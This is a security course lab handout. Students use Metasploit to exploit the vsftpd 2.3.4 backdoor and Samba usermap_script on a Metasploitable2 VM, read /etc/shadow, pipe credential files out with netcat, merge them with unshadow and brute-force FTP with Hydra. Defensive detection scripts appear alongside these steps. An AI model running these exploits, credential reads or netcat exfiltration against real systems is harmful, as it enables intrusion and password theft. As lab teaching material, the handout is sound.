Lab 5 - Exploitation (Metasploit)

Metasploit is an open source platform for vulnerability research, exploit development, and the creation of custom security tools. In this lab, we're going to be using Metasploit to attack the Metasploitable2 VM.

Activities

Part 1 - Getting Started

Update Kali:

$ sudo apt update
$ sudo apt upgrade

Start the Kali PostgreSQL service (which Metasploit uses as its backend):

$ sudo systemctl start postgresql
# (Will launch the service postgresql@14-main and then exit...)

Initialise the Metasploit PostgreSQL Database:

$ sudo msfdb init    # Only do this ONCE, not every time!

Launch msfconsole in Kali:

$ msfconsole

Verify database connectivity

msf6> db_status
# Should see:
# [*] Connected to msf. Connection type: postgresql.

Add a new workspace for this lab. A workspace lets you label the data collected (hosts, vulnerabilities, etc.) for a specific project in the database.

See Also: Managing Workspaces

msf6> workspace -a 178-metasploitable2

(Tip: If you need to select this workspace later, type workspace 178-metasploitable2)

Review the currently configured workspaces. A * marks the currently selected workspace.

msf6> workspace

Run nmap over the subnet where you know the Metasploitable2 VM is running. The db_nmap command saves the results of the nmap scan to the database. Use a -A (ALL THE THINGS!) scan here: we know there are only a few systems in this subnet (Metasploitable2, Kali, and perhaps your host OS if you're using VMware), so it won't take too long.

msf6> db_nmap -A xxx.xxx.xxx.0/24     ### e.g. 172.16.196.0/24

View the list of hosts found in the nmap scan:

msf6> hosts
# Verify that the IP address of your Metasploitable2 VM is listed here

View the list of services found in the nmap scan:

msf6> services

Deliverables:

  • There are two FTP servers running on Metasploitable. What are they? For your answer, provide the text in the "info" column of the "services" report, and include the version numbers.

Part 2 - Exploiting VSFTPD

Let's go exploit vsftpd! And learn about Metasploit searching in the process.

First, learn about how search works in Metasploit.

msf6> help search

Then, search for the first target FTP application - VSFTPD

msf6> search type:exploit name:vsftpd

Deliverables:

  • How many exploits were found?
  • What is the full path & name of the exploit? (starting with exploit/...)

Select the exploit you found

msf6> use exploit/unix/.....   # (Provide the full path to exploit here)

Briefly review the information that Metasploit has on this particular exploit

msf6> info

From the exploit information, there is a link to a pastebin.com URL that provides a code diff showing the malicious backdoor that was added to the server. Feel free to review the code; it's a very simple backdoor. If the FTP username contains a :) smiley face, a TCP callback shell is launched.

See Also: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
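The trigger described above is easy to spot from the defender's side. The following is an added example (not part of the lab, and not Metasploit code) that scans constructed FTP control-channel log lines for USER commands containing the ":)" sequence and for banners advertising vsFTPd 2.3.4; the line format "<timestamp> <client_ip> <C|S> <text>" is an assumption made for this example.

```python
"""Added example (not part of the lab or of Metasploit): a log-side check for
the vsftpd 2.3.4 backdoor trigger. It scans constructed FTP control-channel
log lines and flags (a) USER commands whose username contains the ":)" trigger
and (b) server banners advertising vsFTPd 2.3.4. The assumed line format is
"<timestamp> <client_ip> <C|S> <text>" (C = client command, S = server reply)."""
import re
from dataclasses import dataclass

TRIGGER = ":)"                                   # byte sequence the backdoor looks for in USER
BACKDOORED_BANNER = re.compile(r"\(vsFTPd 2\.3\.4\)")
USER_CMD = re.compile(r"^USER\s+(.*)$", re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    client: str
    kind: str     # "trigger" (client sent smiley username) or "banner" (backdoored version)
    detail: str

def scan_ftp_log(lines):
    """Return a Finding per suspicious line; malformed lines are skipped, not fatal."""
    findings = []
    for line in lines:
        parts = line.strip().split(maxsplit=3)
        if len(parts) < 4:
            continue
        _ts, client, direction, text = parts
        if direction == "S" and BACKDOORED_BANNER.search(text):
            findings.append(Finding(client, "banner", text))
        elif direction == "C":
            m = USER_CMD.match(text)
            if m and TRIGGER in m.group(1):
                findings.append(Finding(client, "trigger", m.group(1)))
    return findings

def triggered_clients(findings):
    """Clients that sent the trigger to a server whose banner was the backdoored version."""
    vulnerable = {f.client for f in findings if f.kind == "banner"}
    return sorted({f.client for f in findings if f.kind == "trigger" and f.client in vulnerable})

# Constructed sample traffic (not a real capture)
SAMPLE_LOG = [
    "2020-02-12T12:20:10 172.16.196.173 S 220 (vsFTPd 2.3.4)",
    "2020-02-12T12:20:11 172.16.196.173 C USER alice",
    "2020-02-12T12:20:12 172.16.196.173 S 331 Please specify the password.",
    "2020-02-12T12:20:14 172.16.196.173 C USER bob:)",
    "2020-02-12T12:20:20 10.0.0.9 C USER carol:)",   # trigger, but no backdoored banner seen
    "garbage line",
]
```

Running scan_ftp_log(SAMPLE_LOG) yields one banner finding and two trigger findings; triggered_clients narrows that to the single client that sent the trigger to a server advertising 2.3.4.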

Deliverables:

  • What is the pastebin.com URL with the code diff?

For the same exploit, briefly review the options that are available (i.e. might need to be correctly configured).

msf6> show options

Deliverables:

  • What are the names of the two options that need to be set? Think of these as environment variables. The "R" stands for "Remote". Answer in the order listed in Metasploit's show options output.

Both of these options must be set for the exploit to target the correct host. Set them now with the information you previously learned about the Metasploitable2 VM:

msf6> set RHOSTS aaa.bbb.ccc.ddd   # Must set remote host (IP address of Metasploitable2 VM)
msf6> set RPORT XXXX     # Must set remote port

Now it's time to RUN THE EXPLOIT!

msf6> exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 172.16.196.174:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.196.174:21 - USER: 331 Please specify the password.
[+] 172.16.196.174:21 - Backdoor service has been spawned, handling...
[+] 172.16.196.174:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.196.173:45195 -> 172.16.196.174:6200) at 2020-02-12 12:20:15 -0800

Although you won't see a command prompt, you now have one. Try typing Linux commands at the console.

Deliverables:

  • Using the whoami command, what user are you running as via the exploit?
  • Using the uname -a command, what is the version of the Linux kernel running on the Metasploitable2 VM? Provide the full string.

Finally, obtain the hashed forms of the user passwords on the system for future analysis. On Linux systems, these are stored in the "shadow" file. Use this command to look at the /etc/shadow file and only show lines where an account password has been set. (The others are non-login accounts, i.e. local-only)

cat /etc/shadow | grep '$1' 

Deliverables:

  • What are the hashed ("shadow") forms of the user passwords on the system?

After answering this question, feel free to explore the shell, and then CTRL-C to terminate this session and return to Metasploit.

If you want to leave this particular exploit, use the back command

msf6> back

Part 3 - Exploiting Samba

Samba is an open source implementation of Microsoft file and printer sharing protocols, as well as Active Directory.

First, check the version of Samba that is running (shown in the earlier Nmap scan results). Then, look for exploits in Samba for that version.

msf6> search type:exploit name:samba

Deliverables:

  • What version of Samba is running on the Metasploitable2 VM? (Give the full "info" string from the earlier nmap scan)
  • How many exploits in Samba (not "Sambar") does Metasploit currently have? (Note that the labels begin at zero...)

At first glance, checking for version numbers isn't particularly helpful here. The description either doesn't include applicable version numbers or the versions listed are older than what we're targeting. There aren't that many - maybe we try them all? Or just the ones with a rank of excellent and great? (Or just Google to find out which one Metasploitable2 is susceptible to?)

msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> options
msf6> set RHOSTS aaa.bbb.ccc.ddd   # Must set remote host (IP address of Metasploitable2 VM)
msf6> set LHOST www.xxx.yyy.zzz    # Must set local host (IP address of Kali VM)
msf6> exploit
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 172.16.196.2:4444 
[*] Command shell session 2 opened (172.16.196.2:4444 -> 172.16.196.4:56315) at 2021-01-20 15:21:59 -0800

Although you won't see a command prompt, you now have one. Try typing Linux commands at the console, such as whoami.

Deliverables:

  • What CVE number was this particular vulnerability in Samba assigned?
  • What versions of Samba were susceptible to this vulnerability?
  • After using the Samba exploit, what command could you use to confirm the specific version of Samba that is running on the Metasploitable2 VM? Google will help you with a simple command to run on the remote host to obtain this information.

Now that you have access to the Metasploitable2 system via another exploit, let's try another way to get access to the /etc/passwd and /etc/shadow files on the system - exfiltrating them via Netcat instead of manual copy and paste. This method can also be used to exfiltrate arbitrary files.

See also: Basic methods for data exfiltration

Create a new terminal tab. You should now have two terminal tabs:

  • Tab 1: Kali running Metasploit running the exploit with shell access to the target system
  • Tab 2: Kali at a regular (not msf6) command prompt

On Tab 2 (the Kali regular command prompt), run the Netcat utility, listening, on port 4567

# Run on Tab 2!
# Listening to receive data...
$ nc -l -p 4567 > passwd.txt
# Netcat will wait and receive data into the file for FOREVER

On Tab 1 (the exploit tab with shell access giving you control of the target), pipe the contents of the /etc/passwd file to the Netcat utility, which is set to connect to Kali at the IP and port specified:

# Run on Tab 1!
# Sending data...
cat /etc/passwd | nc xxx.xxx.xxx.xxx 4567
# Update command with the IP address of your Kali VM

There will be no progress bar or other sign of activity. However, you already know the file is small, so it should transfer quickly. No need to wait for it. Go back to the "listening" netcat, kill it with a CTRL-C and inspect the contents of the passwd.txt file using the cat utility. Does it have the data you were expecting? If so, good! If not, re-check your commands and try again until you've exfiltrated the passwd file.

Modify and repeat those two commands to exfiltrate the /etc/shadow file as well.

In this particular instance, it is more helpful to combine the passwd and shadow files together into a single file for future password-cracking (next lab!). Use the unshadow command on the Kali host to merge those two files together, and save it for later.

$ unshadow passwd.txt shadow.txt > metasploitable_logins.txt
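To make clear what the shadow grep in Part 2 and the unshadow step here actually produce, the following added example (not the lab's code and not the unshadow tool itself) merges constructed passwd and shadow records the way unshadow does and then reports which accounts hold a real hash and which crypt(3) algorithm ($1$ = md5crypt on Metasploitable2) protects it. All records and hash strings are constructed placeholders.

```python
"""Added example (not the lab's own code, nor the unshadow tool): merges
constructed /etc/passwd and /etc/shadow records the way unshadow does (the
shadow hash replaces the "x" placeholder in the passwd password field), then
audits which accounts hold a crackable hash and which algorithm protects them."""

# crypt(3) "$id$" prefixes and the algorithms they denote
HASH_ALGORITHMS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
                   "2b": "bcrypt", "y": "yescrypt"}

def merge_passwd_shadow(passwd_lines, shadow_lines):
    """Return passwd-format lines with the password field filled in from shadow."""
    shadow = {}
    for line in shadow_lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) >= 2:
            shadow[fields[0]] = fields[1]
    merged = []
    for line in passwd_lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) != 7:          # skip malformed passwd records
            continue
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]]
        merged.append(":".join(fields))
    return merged

def classify_hash(field):
    # Empty field, locked field ("!" or "*"), "$id$" hash, or legacy 13-char DES crypt
    if field == "":
        return "empty (no password required)"
    if field.startswith(("!", "*")):
        return "locked (no password login)"
    if field.startswith("$"):
        hash_id = field.split("$")[1]
        return HASH_ALGORITHMS.get(hash_id, "unknown ($%s$)" % hash_id)
    return "descrypt (legacy 13-char DES)"

def audit(merged_lines):
    # (username, algorithm description) for every merged record
    return [(line.split(":")[0], classify_hash(line.split(":")[1])) for line in merged_lines]

# Constructed sample records; the hash strings are placeholders, not real hashes
PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh",
    "service:x:1002:1002:,,,:/home/service:/bin/bash",
]
SHADOW = [
    "root:$1$CONSTRUCTEDSALT$CONSTRUCTEDHASHPLACEHOLDER:14000:0:99999:7:::",
    "daemon:*:14000:0:99999:7:::",
    "service:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHPLACEHOLDER:14000:0:99999:7:::",
]
```

Call audit(merge_passwd_shadow(PASSWD, SHADOW)) to see which accounts would end up in a cracking file and which ones (locked, or using a weak algorithm such as md5crypt) deserve attention first.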

Feel free to explore the exploit shell, and then CTRL-C to terminate this session and return to Metasploit.

Deliverables:

  • What are the contents of the merged metasploitable_logins.txt file?

Part 4 - Hydra

Hydra is a brute force parallelized login cracker which supports numerous protocols to attack via online attacks, including: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Use Hydra to do online password guessing against a single username in Metasploitable2. How do we know this username? Multiple ways: from accounts on other systems, from email addresses, from likely combinations of human names, or just by guessing (root, admin, Administrator, user, etc.).

Run xhydra (the GUI version of the command-line hydra) with the following settings:

  • Crack the service username,
  • over ftp (file transfer protocol),
  • with 4 concurrent tasks (a.k.a. threads) to avoid swamping the server and having it drop requests,
  • and using the basic password file from John the Ripper at /usr/share/john/password.lst
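Online guessing of this kind leaves a burst of failed logins for one username from one client in the FTP server's log. The following added example (not part of the lab, and not Hydra code) is a small detector run over constructed vsftpd-style log lines; the failure threshold and time window are assumptions chosen for the example.

```python
"""Added example (not part of the lab or of Hydra): detects the online
password-guessing pattern in constructed vsftpd-style log lines by flagging any
(client, username) pair with at least THRESHOLD failed logins inside a sliding
WINDOW of seconds. Both values are assumptions for this example."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"$'
)
THRESHOLD = 5     # failed logins
WINDOW = 10       # seconds

def parse_line(line):
    # Return (timestamp, user, result, client), or None for lines that do not match
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("client")

def detect_guessing(lines, threshold=THRESHOLD, window=WINDOW):
    """Sorted (client, user) pairs whose failure rate crossed the threshold."""
    recent = defaultdict(deque)   # (client, user) -> timestamps of recent failures
    alerts = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, result, client = parsed
        if result != "FAIL":
            continue
        q = recent[(client, user)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold:
            alerts.add((client, user))
    return sorted(alerts)

# Constructed sample log: six rapid failures for one account from one client, plus noise
SAMPLE_LOG = [
    'Wed Feb 12 12:20:%02d 2020 [pid 1234] [service] FAIL LOGIN: Client "172.16.196.173"' % s
    for s in range(10, 16)
] + [
    'Wed Feb 12 12:20:30 2020 [pid 1240] [service] OK LOGIN: Client "172.16.196.173"',
    'Wed Feb 12 12:25:00 2020 [pid 1250] [msfadmin] FAIL LOGIN: Client "10.0.0.9"',
    'not a vsftpd line',
]
```

With the defaults, detect_guessing(SAMPLE_LOG) reports only the service account hammered from 172.16.196.173; the single failure for msfadmin stays below the threshold.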

Deliverables:

  • What is the command-line invocation that the GUI built from setting those specified options? It's shown at the bottom of the window.
  • How long did it take Hydra to find this password?
  • What was the password for that account?

Part 5 - Exploiting Something Else

It's time for you to explore Metasploit!

Using Metasploit and your Google skills, discover another exploit that works on the Metasploitable2 VM. There are many described online in blogs and tutorials, or you could use the list of services and search functionality to pull out a vulnerability without external knowledge.

Deliverables:

  • What service is the vulnerability in?
  • What is the full name (exploit/...) of the vulnerability in Metasploitable?
  • What options does the exploit need to function?
  • How does the vulnerability/exploit work?